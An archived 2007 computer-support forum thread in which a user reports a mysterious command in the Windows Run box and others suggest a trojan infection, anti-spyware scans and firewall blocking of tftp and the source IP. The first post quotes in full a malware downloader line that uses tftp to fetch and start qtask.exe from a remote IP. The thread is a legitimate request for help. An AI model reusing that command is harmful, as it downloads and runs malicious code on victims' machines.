Run command showing a tftp command on it's own

Discussion in 'Computer Support' started by kvine, Jan 12, 2007.

  1. kvine

    kvine Guest

    Hi

    About 5 times yesterday this would show up in my Run command while it
    was working. I have no idea why and doing a virus and adaware scan
    does not fix it. I do not have Quicken installed on my PC.

    tftp -i 216.104.106.132 get qtask.exe& start qtask.exe& exit

    I just want to get rid of it so what else can I try?

    Thanks
    Ken
     
    kvine, Jan 12, 2007
    #1
    1. Advertisements

  2. Maybe you are infected with this:
    http://www.sophos.com/security/analyses/w32rbotaku.html
    ...which says it uses the filename qtask.exe

    Or maybe you have some other trojan that is trying to download it.
    Try the first three (free) anti-spyware programs listed here:
    http://k75s.home.att.net/tips.html#spyware
     
    Beauregard T. Shagnasty, Jan 12, 2007
    #2
    1. Advertisements

  3. kvine

    why? Guest

    So then tell your firewall to

    a) block tftp.exe or .com as an app
    b) block the IP address
    c) block the (default) port
    http://www.iana.org/assignments/port-numbers
    tftp 69/tcp Trivial File Transfer
    tftp 69/udp Trivial File Transfer
    Output from ARIN WHOIS
    ARIN Home Page ARIN Site Map ARIN WHOIS Help Tutorial on Querying
    ARIN's WHOIS
    Search for :
    Search results for: 216.104.106.132

    OrgName: Cyber Beach Communications
    OrgID: CBCH
    Address: 500 Barrydowne Rd
    City: Sudbury
    StateProv: ON
    PostalCode: P3A-5W1
    Country: CA

    Ask them?
    d) rename tftp.exe / .com
    e) delete it (c)
    Fairly simple.

    Me
     
    why?, Jan 12, 2007
    #3
    1. Advertisements

Ask a Question

Want to reply to this thread or ask your own question?

You'll need to choose a username for the site, which only take a couple of moments (here). After that, you can post your question and our members will help you out.